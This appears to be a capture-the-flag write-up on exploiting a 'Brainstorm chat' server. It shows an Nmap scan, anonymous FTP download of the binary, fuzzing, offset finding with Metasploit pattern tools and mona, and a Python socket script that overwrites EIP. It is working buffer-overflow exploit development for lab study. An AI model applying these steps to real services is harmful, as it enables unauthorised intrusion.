**Nmap scan report for 10.10.45.36
Host is up (0.046s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_ SYST: Windows_NT
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-07-14T19:01:07+00:00; -1s from scanner time.
9999/tcp open abyss? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| Welcome to Brainstorm chat (beta)
| Please enter your username (max 20 characters): Write a message:
| NULL:
| Welcome to Brainstorm chat (beta)
|_ Please enter your username (max 20 characters):**
So it looks like abyss is where the binary is connected to and now lets see ftp and see if there is any thing there and is anonymos login allowed and it is and there we have a chatserver.exe and a dll file. Which lets download and transfer it over to our Windows Machine . Lets connect to it and see what it is and its a chatserver application.
and now lets fuzz it on Windows and run it and then connect to the Windows IP using the windows machine is IP on the port 9999 using netcat .
nc <windows ip> 9999
Lets find out where it crashes and stuff so the username field just trims the input to 20 letters where as we send like 2500 characters to the message field it crashes so now lets find the offset where the application crashes we can use msf_pattern-create and create a payload with l 2500
msf-pattern_create -l 2500
we will now get a bunch of cyclic characters which we have to use to crash the application now and then copy the EIP of where it crashed and pass it through msf-pattern_offset to find the exact offset .
and our application crashes and i am using Immunity Debugger to see the output .
and here we can see the EIP is 31704330 we can also utilize mona by doing
!mona po 31704330
and getting our offset here like this
we find out the offset is 2012 and now lets look and confirm if we can actually crash stuff and overwrite the EIP with this .
We do that using python
import socket
import sys
username = b"nickapic"
message = b"A"* 2012 + b"B"*4
print("Sending them bytes")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.146.130",9999))
s.recv(1024)
s.recv(1024)
s.send(username + b'\\r\\n')
s.recv(1024)
s.send(message + b'\\r\\n')
s.recv(1024)
s.close()
and when we do this it works for us and we see the application crashes with the EIP set at 42424242 which is B is hex .